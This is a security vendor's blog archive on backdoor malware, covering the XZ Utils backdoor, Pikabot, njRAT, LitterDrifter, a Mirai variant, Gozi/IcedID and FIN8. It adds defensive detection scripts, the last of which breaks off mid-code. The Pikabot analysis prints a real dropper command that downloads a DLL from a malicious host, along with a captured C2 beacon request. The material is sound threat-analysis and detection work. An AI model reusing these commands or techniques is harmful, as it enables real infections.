Backdoor Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/backdoor/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Feed updated Tue, 02 Apr 2024 11:52:12 +0000.

XZ Utils Backdoor Discovered, Threatening Linux Servers
https://gridinsoft.com/blogs/xz-utils-backdoor-linux/
Tue, 02 Apr 2024 09:32:10 +0000

A backdoor in liblzma, the library at the core of the XZ Utils data compression tool, was discovered by Andres Freund, a PostgreSQL developer. He noticed a half-second delay in SSH logins after an update, which eventually led him to the malicious code. The backdoor appears to be the work of one of the newer XZ maintainers, who pulled off an exceptionally patient supply chain attack.

Backdoor in XZ Compromised Numerous Linux Systems

The story around the backdoor in the XZ data compression tool is remarkable from both ends and may well be filmed one day. A person using the name Jia Tan had been working toward the status of project co-maintainer since 2021. As any technically savvy open-source contributor would, he started by submitting bug fixes and new features. Meanwhile, a stream of complaints and pressure in the project's mailing list, allegedly from accounts associated with the same operation, pushed the sole maintainer to look for help, and Jia Tan was the obvious candidate at that moment.

Figure: JiaTan's account on GitHub

This long road was needed to plant a tiny, deeply concealed backdoor (CVE-2024-3094). The malicious hook is not visible in the public git repository: the modified build script (a tampered build-to-host.m4) exists only in the release tarballs that distributions build from, while the obfuscated payload is stored in two binary files under tests/ that pass for ordinary test data. This explains why the operation took so long: to avoid detection, Jia Tan had to add each piece gradually, making every commit look like routine development. A proper special operation, one may say.

Figure: XZ Utils backdoor

The resulting backdoor hooks the RSA_public_decrypt function inside sshd, so whoever holds the attacker's private key can execute commands on the host before authentication completes. The only conditions are a backdoored liblzma and an sshd that loads it (via libsystemd on distributions that patch OpenSSH for systemd notification). This endangers a great many servers, since SSH is the protocol system administrators most commonly use to reach them. Linux is the backbone of cloud infrastructure, and such a backdoor effectively means access to everything those servers store.

More signs of a coordinated operation surfaced during the investigation. Shortly after the backdoored release was published, requests to update xz to 5.6.x appeared in the bug trackers of several Linux distributions. Investigators believe that either Jia Tan or associates posted them under other names. Some distributions followed through and pulled the backdoored version into their testing branches, effectively installing the malware into their product.

How Was It Discovered?

The way the backdoor was discovered, on the other hand, sounds more like a miracle. Andres Freund noticed that SSH logins took about 500 ms longer than usual and that sshd was burning more CPU time than it should. Profiling the process led him to the updated liblzma, and from there to the backdoor built into it.

Andres Freund published his notification about the malicious changes on March 29, 2024. The backdoored releases, 5.6.0 (February 24, 2024) and 5.6.1 (March 9, 2024), reached the rolling and testing branches of several distributions during March. Affected distributions and versions:

Distribution   Affected versions
Kali           Installs updated after March 26, 2024
Arch           Packages after 2024.03.01; VM images 20240301.218094 and later
Alpine         5.6.x versions before the 5.6.1-r2 update
Debian         Unstable (sid) only, from 5.5.1-alpha-01 through 5.6.1
openSUSE       Tumbleweed and MicroOS snapshots released between March 7 and March 28, 2024
Fedora         Rawhide and Fedora Linux 40 (beta)

Mitigations and Fixes

Shortly after the disclosure, GitHub suspended the project's repository. The suspension did not by itself remove the risk: as mentioned above, the hook that injects the payload lives in the release tarballs consumed by distributions rather than in the git tree, and the encrypted payload sits in two binary files under tests/. Cleaning up therefore meant rebuilding or reverting packages, not just taking the repository offline.

Together with the maintainers of the affected distributions, Andres Freund compiled both the list of affected versions and the mitigations. Users should downgrade to a 5.4.x release that does not contain the malicious code, or upgrade to a rebuilt package where it has been removed, and restart sshd afterwards so that the patched library is actually loaded. The investigation continues, as a supply chain attack of this depth may have further consequences.
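The two checks a practitioner wants on a host are "is the installed xz one of the backdoored releases?" and "does sshd load liblzma at all?", since both must be true for the SSH hook to be reachable. The script below is an added example (not part of the original post or of XZ Utils): it parses the text output of xz --version and of ldd on the sshd binary, both passed in as strings so the logic can be exercised offline with constructed samples; main() collects them from the live system. The path /usr/sbin/sshd is an assumed fallback.

```python
"""Host check for CVE-2024-3094: backdoored xz release, and sshd linking liblzma."""
import re
import shutil
import subprocess
from typing import Optional

# Upstream releases that shipped the malicious build script and test files.
BACKDOORED_VERSIONS = {"5.6.0", "5.6.1"}

# First line of `xz --version` looks like: xz (XZ Utils) 5.6.1
_VERSION_RE = re.compile(r"xz \(XZ Utils\) (\d+\.\d+\.\d+)")


def parse_xz_version(version_output: str) -> Optional[str]:
    """Return the upstream version number reported by `xz --version`.
    Distribution reverts such as Debian's 5.6.1+really5.4.5 are built from
    5.4.5 sources and report 5.4.5 here, so they classify as clean."""
    m = _VERSION_RE.search(version_output)
    return m.group(1) if m else None


def is_backdoored(version: Optional[str]) -> bool:
    return version in BACKDOORED_VERSIONS


def sshd_loads_liblzma(ldd_output: str) -> bool:
    """True when liblzma appears in sshd's link map. Upstream OpenSSH does not
    use liblzma; it reaches sshd through the libsystemd dependency that some
    distributions add for systemd readiness notification."""
    return any(line.strip().startswith("liblzma.so") for line in ldd_output.splitlines())


def assess(version_output: str, ldd_output: str) -> dict:
    version = parse_xz_version(version_output)
    backdoored = is_backdoored(version)
    linked = sshd_loads_liblzma(ldd_output)
    return {
        "xz_version": version,
        "backdoored_xz": backdoored,
        "sshd_links_liblzma": linked,
        # Both conditions must hold for the SSH hook to be reachable.
        "exposed_over_ssh": backdoored and linked,
    }


def _run(cmd: list) -> str:
    """Run a command and return stdout; empty string if it cannot be run."""
    try:
        return subprocess.run(cmd, capture_output=True, text=True, check=False).stdout
    except OSError:
        return ""


def main() -> None:
    xz = shutil.which("xz")
    sshd = shutil.which("sshd") or "/usr/sbin/sshd"  # assumed fallback path
    report = assess(_run([xz, "--version"]) if xz else "", _run(["ldd", sshd]))
    for key, value in report.items():
        print(f"{key}: {value}")


if __name__ == "__main__":
    main()
```

A host where xz reports 5.6.1 but sshd does not link liblzma still has the malicious library installed and should be fixed, it just is not reachable over SSH; conversely, linking liblzma with a clean 5.4.x is the normal state on systemd-patched distributions.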

Trojan:Win32/Znyonm
https://gridinsoft.com/blogs/trojanwin32-znyonm-detection/
Fri, 15 Mar 2024 08:52:36 +0000

Trojan:Win32/Znyonm is a detection name that often appears while backdoor malware is running in the background. Such malware can escalate privileges, enable remote access, or deploy further payloads. Let's look at how this malicious program works and how to remove it.

Trojan:Win32/Znyonm Detection Overview

Trojan:Win32/Znyonm is a detection associated with backdoor malware, usually samples that rely on heavy obfuscation and anti-analysis techniques. In particular, this detection name shows up on malware such as GuLoader, Remcos RAT, and Pikabot. Other families can trigger it too, because Microsoft attaches the name to a set of properties rather than to a specific malware family.

Figure: Znyonm detection

The primary objectives of Znyonm are facilitating remote access and deploying additional payloads. As a preliminary stage, it establishes persistence, escalates privileges, and communicates with command-and-control (C2) servers. Among the samples on VirusTotal, I've seen multi-stage loading of code fragments from remote servers via .LNK files, VBS and PowerShell scripts. This staging helps it slip past antivirus detection and deliver an arbitrary payload to the victim's computer.

Znyonm Trojan Analysis

For the analysis I picked one of the fresh Pikabot samples flagged as Znyonm. Pikabot is a modular backdoor that emerged in early 2023 and gained prominence as a replacement for the infamous QakBot. It serves as the initial access stage in high-profile attacks; its primary delivery tactics are spear phishing and email thread hijacking. Once inside, Pikabot deploys additional tooling, ransomware, or other malware.

Spreading ways

Znyonm/Pikabot gains initial access through spear phishing. It targets users with convincing emails that look like routine workflow messages; the attackers rely on thread hijacking to make them look genuine. The attachment varies, from a PDF document to a ZIP archive containing the payload. In either case, the email text tries to convince the user to open the attachment and follow its instructions.

Figure: Typical example of a message that spreads Pikabot (source: ANY.RUN)

Another method is malvertising via major ad engines like Google or Facebook. Hackers trick users into downloading and installing malware by using the names of popular free software, drivers, and tools. The sites used in these campaigns live for an extremely short time but can infect hundreds of users.

Unpacking, Launch & Persistence

Upon execution, Znyonm runs a set of anti-analysis checks, among them a call to NtQueryInformationProcess to detect a debugger. It then decrypts the DLL it carries and performs another round of anti-analysis and anti-debug tricks. After passing them, the malware assembles its core from the encrypted parts of that DLL and injects it into a legitimate process via process hollowing, which also gives it the privileges of the hollowed process. The dropper stage observed in the sample ran the following command to fetch the DLL:

"C:\Windows\System32\cmd.exe" /c mkdir C:\Gofkvlgdigt\Ekfgihcifmv & curl hxxps://ucakbiletsorgulama.com/U14/0.16930199040452631.dat --output C:\Gofkvlgdigt\Ekfgihcifmv\Ikfigkvosjr.dll

Pikabot avoids detection by resolving its first three API functions through API hashing rather than an import table. It then switches to resolving further APIs at runtime, which hides its capabilities from static analysis and from EDR/XDR hooks on the import table. Before gathering system information, the malware checks the system language and stops if it finds one from its ban list. After passing that check, it collects system properties to fingerprint the host.

Figure: Pikabot checks the system language

The fingerprint includes the user name, computer name, display information, CPU information, physical and virtual memory, domain controller name, operating system version, and a snapshot of the running processes. This is a typical data set for backdoor malware, used to tell one infected system from another. Some backdoors have gained the ability to collect far more over time, edging closer to spyware.

C2 Communication

The malware sends collected data to the command server using an HTTP POST request over HTTPS protocol. Upon the first contact, the command server sends the response with the command and configuration info. The latter consists of a command-specific code, URL, file address, and the action malware should execute. Some of the commands also require Pikabot to send the results to the C2.

POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Accept: */*
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.8
User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)
Content-Length: 6778
Host: 158.220.80.167:2967

00001a7600001291000016870000000cbed67c4482a40ad2fc20924a06f614a40256fca898d6d2e88eecc638048874a8524d73037ab3b003be6453b7d3971ef2d449e3edf6c04a9b8a97e149a614ebd34843448608687698bae262d662b73bb316692e52e5840c51a0bad86e33c6f8926eb850c2
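A beacon like the one above carries several signals a network detection can score without decrypting the body: the request-line target disagrees with the Host header, the server is a raw IP on a non-standard port, an Outlook user agent is posting to a path no Exchange client would use, and the POST body is bare hex with no Content-Type. The scorer below is an added example (not from the original post): it parses raw HTTP/1.1 request text and adds points per indicator. The sample requests are constructed, the beacon one modelled on the capture above with the scheme left defanged and a shortened body; the weights, threshold and the list of Outlook-like paths are my own choices.

```python
"""Heuristic scoring of raw HTTP requests for Pikabot-style beacons."""
import re
from dataclasses import dataclass, field
from urllib.parse import urlsplit

IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
HEX_BODY = re.compile(r"^[0-9a-f]+$", re.IGNORECASE)
# Paths a genuine Outlook client would plausibly talk to (assumed list).
OUTLOOK_PATHS = ("autodiscover", "/ews/", "/owa/", "/mapi/")


@dataclass
class Verdict:
    score: int = 0
    reasons: list = field(default_factory=list)

    def add(self, points: int, why: str) -> None:
        self.score += points
        self.reasons.append(why)


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (method, target, headers, body)."""
    raw = raw.replace("\r\n", "\n").lstrip("\n")
    head, _, body = raw.partition("\n\n")
    lines = head.splitlines()
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, target, headers, body.strip()


def score_request(raw: str) -> Verdict:
    method, target, headers, body = parse_request(raw)
    v = Verdict()
    url = urlsplit(target)  # absolute-form target => netloc is set
    host_header = headers.get("host", "")
    if url.netloc and host_header and url.netloc != host_header:
        v.add(2, f"request target {url.netloc} != Host header {host_header}")
    origin = urlsplit("//" + (url.netloc or host_header))
    if origin.hostname and IPV4.match(origin.hostname):
        v.add(1, f"raw IP literal {origin.hostname} instead of a hostname")
    if origin.port not in (None, 80, 443):
        v.add(1, f"non-standard port {origin.port}")
    ua = headers.get("user-agent", "")
    if "Microsoft Office" in ua and not any(p in url.path.lower() for p in OUTLOOK_PATHS):
        v.add(1, "Office/Outlook user agent posting to a non-Exchange path")
    if method == "POST" and body and HEX_BODY.match(body) and "content-type" not in headers:
        v.add(2, "POST body is bare hex with no Content-Type")
    return v


def is_suspicious(raw: str, threshold: int = 4) -> bool:
    return score_request(raw).score >= threshold


# Constructed sample modelled on the beacon above (scheme defanged, body shortened).
SAMPLE_BEACON = "\n".join([
    "POST hxxps://15.235.47.80:23399/api/admin.teams.settings.setIcon HTTP/1.1",
    "Cache-Control: no-cache",
    "Connection: Keep-Alive",
    "Accept: */*",
    "User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)",
    "Content-Length: 56",
    "Host: 158.220.80.167:2967",
    "",
    "00001a7600001291000016870000000cbed67c4482a40ad2fc20924a",
])

# Constructed benign request: a real Outlook client talking to EWS.
SAMPLE_BENIGN = "\n".join([
    "POST /ews/exchange.asmx HTTP/1.1",
    "Host: mail.example.com",
    "User-Agent: Microsoft Office/14.0 (Windows NT 6.1; Microsoft Outlook 14.0.7166; Pro)",
    "Content-Type: text/xml",
    "",
    "<soap/>",
])

if __name__ == "__main__":
    for name, sample in (("beacon", SAMPLE_BEACON), ("benign", SAMPLE_BENIGN)):
        v = score_request(sample)
        print(name, v.score, is_suspicious(sample), v.reasons)
```

Only the combination is meaningful: a raw IP with an odd port is common in lab traffic, and Office user agents are easy to forge, but a hex-only POST with no Content-Type to a host that does not match the request target is the kind of stack that merits pulling the full session.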

How to Remove Trojan:Win32/Znyonm?

If you receive a notification about a Trojan:Win32/Znyonm detection, an anti-malware scan is needed. As the analysis above shows, Znyonm is nothing to take lightly and can lead to more serious and varied infections. GridinSoft Anti-Malware fits the task: launch a Full scan and let it finish, and it will take care of everything dangerous present on the system.

Backdoor:Win32/Bladabindi!ml Analysis & Removal Guide
https://gridinsoft.com/blogs/backdoorwin32-bladabindiml-analysis-removal-guide/
Tue, 05 Mar 2024 14:37:22 +0000

Backdoor:Win32/Bladabindi!ml is a generic detection name used by Microsoft Defender. It refers to the njRAT backdoor, which lets attackers take control of victims' computers. This article explains when the detection points to a real trojan and when it is a false positive.

What is Backdoor:Win32/Bladabindi!ml?

Backdoor:Win32/Bladabindi!ml is the Microsoft Defender detection for njRAT, which is categorized as a backdoor. "Bladabindi" is one of several names antivirus vendors use to identify this family.

NjRAT is a trojan and can be installed on a computer without the user’s knowledge. It acts as a backdoor, giving attackers remote access and control over the infected system. Once installed, njRAT can perform various activities including collecting sensitive information, recording keystrokes, stealing passwords, intercepting traffic, and even controlling the computer’s webcam and microphone.

Figure: njRAT execution chain

Bladabindi!ml can be spread in a variety of ways. This includes email attachments or malicious links, downloads via malicious websites, exploitation of software vulnerabilities, or social engineering. It can also self-propagate by infecting USB drives connected to an infected computer. Cybercriminals can use various methods to trick users into installing njRAT on their computers.

Bladabindi Backdoor Threat Analysis

NjRAT exists in several versions, seen in different attacks, but they differ little in capabilities and effects. Let's look at what a typical Bladabindi sample does to a system.

Launch and Detection Evasion

Bladabindi employs various techniques to evade detection at launch. It ships with a builder that lets the operator configure the payload before delivery: the name of the executable, whether a startup key is created in the registry, the installation directory on the target, the C2 host IP address and port, among other options.

Figure: njRAT builder and custom settings

Such customization lets each njRAT build slip past static signature checks. Additionally, the malware is typically run through one or more .NET obfuscators, making its code hard to analyze for both humans and automated systems. Together these traits make njRAT difficult to analyze and detect, which largely explains its longevity.

Establishing Persistence

After the initial system checks, the Bladabindi backdoor ensures persistence by placing a startup copy in the Startup folder, typically "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp". It also creates a registry key with a unique, random-looking name of letters and digits under "HKEY_CURRENT_USER\Software\32". These entries make the malware run at every boot and keep its foothold on the machine across reboots.

Figure: Registry entry created by the malware during installation

Data Collection & Other Functionality

After finishing these preparations, njRAT a.k.a. Bladabindi performs basic callouts to the command server. Depending on the response, the malware can go idle, start collecting user data, or pull an additional payload from the remote server. The overall list of actions it can perform:

  • Executing remote shell commands
  • Downloading and uploading files
  • Capturing screenshots
  • Logging keystrokes
  • Camera and microphone access
  • Stealing credentials from web browsers and desktop crypto applications

Is Win32/Bladabindi!ml false positive?

Some legitimate programs have features or behaviours that antivirus software mistakes for suspicious, and Microsoft Defender then raises a false positive. Typical triggers are certain API usage, network requests, or data encryption that are characteristic of malware but also present in legitimate applications.

It's also worth noting that the "!ml" suffix marks a verdict from Defender's machine-learning detection engine. It is an effective method, but without confirmation from signature or behavioural detection it is more prone to false positives.

How to Remove Backdoor:Win32/Bladabindi!ml Virus?

The most reliable way to remove Backdoor:Win32/Bladabindi!ml is an antivirus program with up-to-date databases. I recommend GridinSoft Anti-Malware; it is well suited to detecting and removing even sophisticated malware like Bladabindi/njRAT.

After removing Win32/Bladabindi!ml, it is recommended to perform additional system scans to make sure that all threats have been successfully removed. And in the future, be vigilant when surfing the Internet and downloading files. Avoid visiting suspicious websites and opening attachments from unreliable sources.

LitterDrifter – Russia's USB Worm Targeting Ukrainian Entities
https://gridinsoft.com/blogs/litterdrifter-usb-worm/
Wed, 22 Nov 2023 14:34:03 +0000

LitterDrifter is a USB worm attributed to the Gamaredon group, a Russia-linked actor. It targets Ukrainian entities, adding another layer to the already complex world of state-sponsored cyber espionage. The worm showcases Gamaredon's adaptability and raises questions about the geopolitical implications of this latest tool.

Who are Gamaredon?

Gamaredon's profile goes beyond its espionage goals. The Security Service of Ukraine (SSU) has linked Gamaredon personnel to the Russian Federal Security Service (FSB), which handles counterintelligence, antiterrorism and military surveillance; that link underscores the state-sponsored nature of the group's operations. Despite the ever-changing list of targets, Gamaredon's infrastructure shows consistent patterns, which is exactly what defenders should watch for.

What is LitterDrifter?

One of Gamaredon's tools is the USB-propagating worm LitterDrifter. Written in VBScript, it shows the group's adaptability: despite belonging to an old-fashioned malware type, it packs the functions a modern campaign needs.

As part of the APT's infrastructure, LitterDrifter adds a global element to Gamaredon's operations. Beyond its intended targets in Ukraine, the worm has left potential infections in countries such as the USA, Vietnam, Chile, Poland, Germany and Hong Kong. That reach shows the threat actor's potential for campaigns well beyond its primary region.

LitterDrifter's core functionality is that of a remote access tool: a backdoor with worm-like self-spreading. A backdoor is a hidden, unauthorized access path into a computer, a piece of software or a network. In attacks, backdoors mostly serve as initial access and reconnaissance tools that then "open the gates" for further malware.

Figure: USB-propagating worm LitterDrifter

Gamaredon’s Campaign Against Ukraine

Gamaredon Group has run a sustained, targeted cyber espionage campaign against Ukraine and its institutions since at least 2013, covering the military, non-governmental organizations (NGOs), the judiciary, law enforcement, and nonprofit entities. The group, suspected of ties to Russian intelligence, has consistently focused on Ukrainian entities, which is evident in its Ukrainian-language lures and its choice of targets.

LitterDrifter is yet another tool in the group's multifaceted operations. As ongoing monitoring by researchers shows, Gamaredon uses LitterDrifter alongside other techniques and malware to reach its objectives, which further cements its status as an advanced persistent threat against Ukrainian and allied interests.

Protection against LitterDrifter

As LitterDrifter reveals its global impact, it prompts a call for a unified and fortified global cybersecurity defense. The worm’s ability to transcend borders underscores the importance of international collaboration in addressing and mitigating cyber threats.

Protecting from threats like LitterDrifter requires a combination of proactive cybersecurity practices and vigilance. Here are some recommendations to enhance your protection against such worms:

  • Be cautious when inserting USB drives into your computer, especially if they are from unknown or untrusted sources. Consider using USB drives that have read-only switches to prevent unauthorized writing.
  • Regularly back up your important data and keep the backups offline or in a separate secure location. If a destructive follow-on attack such as ransomware hits, recent backups let you restore without paying.
  • Follow security best practices such as using strong, unique passwords, enabling two-factor authentication, and limiting user privileges. These practices can add layers of protection against various cyber threats.
  • Keep yourself informed about the latest cybersecurity threats and vulnerabilities. Being aware of the evolving threat landscape enables you to adapt your security measures accordingly.

Mirai variant "Pandora" infects Android TV for DDoS attacks
https://gridinsoft.com/blogs/mirai-pandora-infects-android-os/
Sat, 09 Sep 2023 12:07:20 +0000

A new variant of the Mirai botnet has been found infecting low-cost Android TV set-top boxes, which millions of people use for media streaming. According to the analysis, the trojan is a fresh edition of the "Pandora" backdoor first identified in 2015.

The campaign targets low-cost Android TV boxes such as Tanix TX6, MX10 Pro 6K, and H96 MAX X3. These devices have quad-core processors that can launch powerful DDoS attacks, even in small swarm sizes.

Mirai Botnet Aims Android-based TV Boxes

The botnet infects devices through malicious firmware updates signed with publicly available test keys, or through malicious apps distributed on sites aimed at users looking for pirated content. In the first case, the firmware is either installed by resellers of the devices or users are tricked into downloading it from websites that promise unrestricted media streaming or better application compatibility.

The modified 'boot.img' contains the kernel and ramdisk loaded during Android boot, which makes it an excellent persistence mechanism for the malicious service: it survives app removal and factory resets of the user partition.

Figure: Malicious service

The second distribution channel involves the use of pirated content apps. They also offer access to collections of copyrighted TV shows and movies for free or at a low cost. Security experts have identified Android apps that spread the new Mirai malware variant to infected devices. Here is an example:

Figure: Site dropping the malware

In this case, the malicious apps surreptitiously start the ‘GoMediaService‘ during the initial launch and set it to auto-start when the device boots up.

When the ‘gomediad.so‘ service is called, it unpacks multiple files, including a command-line interpreter that runs with elevated privileges (‘Tool.AppProcessShell.1‘) and an installer for the Pandora backdoor (‘.tmp.sh‘).

Figure: GoMedia service structure

After being activated, the backdoor establishes communication with the C2 server, and replaces the HOSTS file. After that, it updates itself and then enters standby mode, waiting for instructions from its operators. The malware can launch DDoS attacks using the TCP and UDP protocols, such as generating SYN, ICMP, and DNS flood requests. It can also open a reverse shell, mount system partitions for modification, and perform other functionalities.

Figure: Mirai botnet IoCs

What devices are at risk?

Budget-friendly Android TV boxes often have an uncertain journey from manufacturer to consumer. It leaves the end-user unaware of their origins, potential firmware modifications, and the various hands they’ve been through.

Even cautious consumers who retain the original ROM and are selective about app installations face a lingering risk of preloaded malware on their devices. It is advisable to opt for streaming devices from trusted brands like Google Chromecast, Apple TV, NVIDIA Shield, Amazon Fire TV, and Roku Stick.

Safety recommendations

For Android TV users, installing apps only from the official app store is advisable. It is also essential to pay attention to the permissions requested by the app. If your app requests access to your phonebook and geo-location, it is best to avoid using it as it could be malware. Additionally, it is crucial not to download or install any hacked apps, as their contents are often infected with malware of some kind.

Gozi and IcedID Trojans Spread via Malvertising
https://gridinsoft.com/blogs/gozi-iceid-malvertising/
Mon, 24 Jul 2023 12:18:32 +0000

Malvertising on Google Search is a scheme in which malicious ads appear in search results. Search ads are meant to help users find relevant information, but cybercriminals buy them to lure users to harmful websites and trick them into downloading malware.

How does malvertising work?

Malvertising is an attack where malicious code is inserted into legitimate online advertising networks. This code usually leads users to harmful websites.

Figure: How malvertising works

Some malicious actors create fake websites that mimic legitimate software sites, using tactics like typosquatting (using misspelled versions of well-known brand and company names as their URL) or combosquatting (combining popular names with random words for their URL). This makes the fake sites appear legitimate to unsuspecting users, as their domain names reference the original software or vendor. The fake web pages are designed to look identical to the real ones, and the threat actors pay to promote the site through search engines to boost its visibility.
Figure: Fake WinRAR ad in Google search results
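The two naming tricks above, typosquatting and combosquatting, can be caught mechanically against a list of brands you care about. The classifier below is an added example (not from the original post): it strips a domain down to its registrable label, compares it with each brand by edit distance for typosquats, and looks for the brand embedded in a longer label for combosquats. The brand list, the legitimate domains mapped to each brand, and every domain in the demo are constructed for the example; none is an indicator from the post.

```python
"""Flag typosquatting and combosquatting domains against a brand list."""

# Brand keyword -> its legitimate registered domain (assumed for the example).
BRANDS = {"winrar": "win-rar.com", "7zip": "7-zip.org", "chatgpt": "openai.com"}


def levenshtein(a: str, b: str) -> int:
    """Classic edit distance (insert, delete, substitute), O(len(a) * len(b))."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def classify(domain: str) -> dict:
    """Return {"domain", "kind", "brand", "distance"} for one domain.

    kind is one of: legitimate, typosquat, combosquat, unrelated.
    Only single-label public suffixes (.com, .org) are handled; add a public
    suffix list for country-code second-level domains such as .co.uk."""
    parts = domain.lower().strip(".").split(".")
    registered = ".".join(parts[-2:])
    label = parts[-2] if len(parts) >= 2 else parts[0]
    normalized = label.replace("-", "")  # "win-rar" and "winrar" are the same word
    result = {"domain": domain, "kind": "unrelated", "brand": None, "distance": None}
    for brand, legit in BRANDS.items():
        if registered == legit:
            return {"domain": domain, "kind": "legitimate", "brand": brand, "distance": 0}
        dist = levenshtein(normalized, brand)
        limit = 1 if len(brand) < 8 else 2  # tolerate one edit for short brands
        if dist <= limit:
            # Covers misspellings (wimrar.com) and TLD swaps (winrar.net).
            return {"domain": domain, "kind": "typosquat", "brand": brand, "distance": dist}
        if brand in normalized:
            result = {"domain": domain, "kind": "combosquat", "brand": brand, "distance": dist}
    return result


# Constructed candidates as they might show up in ad-landing-page telemetry.
SAMPLE_DOMAINS = [
    "www.win-rar.com", "wimrar.com", "winrar.net",
    "winrar-pro-download.com", "chatgpt-desktop-app.com", "example.com",
]

if __name__ == "__main__":
    for d in SAMPLE_DOMAINS:
        print(classify(d))
```

Edit distance alone misses homoglyphs (Cyrillic letters, "rn" for "m"), so in production the label should be mapped through a confusables table before the distance is computed; the structure of the check stays the same.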

Google processes over 8 billion queries a day, which makes its search results one of the largest advertising networks available. A single malicious ad can be shown to millions of people and clicked by thousands, and the problem compounds when many popular search topics carry such ads at once.

BatLoader as malware loader

BatLoader is a loader: malware whose job is to fetch more capable malware onto a compromised system. In these campaigns its batch script downloads two payloads, the IcedID banking trojan and the Gozi/Ursnif backdoor.

Notably, the BatLoader campaign still relies on malvertising, unlike IcedID. The targeting has shifted as well: while the malicious ads of late 2022 and early 2023 aimed at people searching for IT tools, recent campaigns use AI-related lures aimed at users searching for tools such as Midjourney and ChatGPT.

IcedID Malware

IcedID (a.k.a BokBot) is a type of malware that was first discovered in 2017 and classified as both a banking Trojan and a remote access Trojan (RAT). Experts say IcedID is as powerful as other advanced banking Trojans like Zeus, Gozi, and Dridex. To infect a system, IcedID relies on other malware like Emotet to get initial access. Once it’s in, IcedID can steal financial information and even drop malware like ransomware. It’s also capable of moving through a network with ease.

Figure: Encrypted zip archives used to deliver IcedID

The group called Shatak often sends phishing emails to spread malware called IcedID. They attach Microsoft Office documents with macros, .iso files, or encrypted .zip archives. Once the malware infects a system, it searches for the best way to spread and gain control. It does this by looking for a way to install itself without being detected and then waits for the system to reboot before activating its main module. By doing this, IcedID can blend in with legitimate processes, making it harder to detect.

Gozi backdoor/banking trojan

URSNIF, the malware also known as Gozi, attempts to steal online banking credentials from victims’ Windows PCs and is evolving to support extortion. This banking trojan has been around since the mid-2000s and is one of the oldest in existence. It has multiple variants and has gone by names such as URSNIF, Gozi and ISFB. Over the years it has gone through many iterations and crossed paths with other malware families, and its source code has been leaked twice since 2016. According to malware analysts, it is now better described as a “set of related siblings” than as a single malware family.

Malware Mitigation and Prevention

Detecting and mitigating malvertising attacks is challenging, and both end users and publishers must act to combat the threat. At the enterprise level, a comprehensive cybersecurity program is the best protection; organizations that take appropriate precautions reduce their risk of falling victim.

These are the most effective methods for protecting yourself from attack:

  • Antivirus software protects against certain types of threats, such as drive-by downloads or malicious code that a malvertising ad may execute.
  • Ad blockers provide considerable protection against malvertising, since they block most ads along with their potentially harmful components.
  • Updating your browser and plugins prevents many malvertising attacks, especially those that trigger before the user even clicks on an advertisement.
  • Prioritize critical systems and implement Zero Trust solutions wherever feasible.
  • Enable multi-factor authentication for all essential services, particularly online banking and cryptocurrency accounts.
  • Conduct user awareness training on phishing techniques, and establish standard operating procedures (SOPs) for handling suspicious emails and documents.

Knowing standard social engineering tactics such as phishing and malspam is essential for spotting malware attacks. Network traffic analysis can help spot known malware variants after infection, but developers frequently update their malware with new evasion methods, so reliably detecting infections is difficult without advanced endpoint protection products.

FIN8 Updated Sardonic Backdoor to Deliver Noberus Ransomware
https://gridinsoft.com/blogs/fin8-sardonic-backdoor-noberus-ransomware/ (Fri, 21 Jul 2023 11:21:46 +0000)
FIN8, an infamous cybercrime group, has updated its backdoor malware to avoid detection. After a period of inactivity the threat actor has returned with a modified version of its Sardonic backdoor, which it now uses to deploy the Noberus ransomware. This fits the group’s usual approach of constantly changing and improving its malware arsenal.

Who are FIN8 a.k.a “Syssphinx”?

There is a financially motivated cybercrime group known as FIN8 or “Syssphinx” with a reputation for targeting various organizations without discrimination. They have been known to target companies in industries such as chemicals, entertainment, finance, hospitality, insurance, retail, and technology.

The malicious group FIN8 uses spear phishing and social engineering tactics to target victims while employing living-off-the-land techniques to conceal their activities. Recently, researchers discovered a new version of the Sardonic backdoor, initially identified by Bitdefender in 2021. Although the latest version is more extensive and has some differences, it may not necessarily be an improvement overall. The researchers noted that some of the changes seem unnatural and could be an attempt by the threat actors to avoid detection by disguising similarities with previous versions.

Updated Sardonic Backdoor Malware

Some hackers update their malware after it has been discovered, and that is what happened with Sardonic after its 2021 exposure: the goal is to bypass the detections written for the old version. The researchers found that the new Sardonic backdoor is very similar to the previous one, but with many code changes that give it a distinct look. These changes were not arbitrary: the updated version adds support for more plugin formats, which gives the attackers more options.

Experts have analyzed a new Sardonic backdoor variant written in C instead of C++, which was used for the previous variant. This backdoor was found to be embedded indirectly into a PowerShell script that is used to infect target machines. Unlike the last variant, this new variant doesn’t use an intermediate downloader shellcode to download and execute the backdoor.

This script in PowerShell decodes a binary file for .NET Loader and then loads it into the current process. The loader will then decrypt and execute both the injector and the backdoor.
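The loading chain described above (a PowerShell script that decodes an embedded .NET binary and hands it to the CLR inside its own process) leaves a recognisable footprint in PowerShell Script Block Logging (Event ID 4104). The triage rule below is an added example, not code from the original post and not FIN8’s script: it scores constructed sample script blocks on that footprint, and only calls something a loader when both halves of the pattern (a base64 decode and Assembly::Load) are present, because either alone is common in benign administration scripts.

```python
import re

# Added example (not from the original post, nor FIN8 code): a small triage rule
# for PowerShell Script Block Logging (Event ID 4104) text that flags the pattern
# described above: a script that decodes an embedded .NET binary and loads it into
# its own process. The sample script blocks below are constructed for the example.

INDICATORS = {
    "base64_decode": re.compile(r"FromBase64String\s*\(", re.I),
    "assembly_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load\s*\(", re.I),
    "in_memory_exec": re.compile(r"\.(Invoke|EntryPoint|GetType)\s*\(", re.I),
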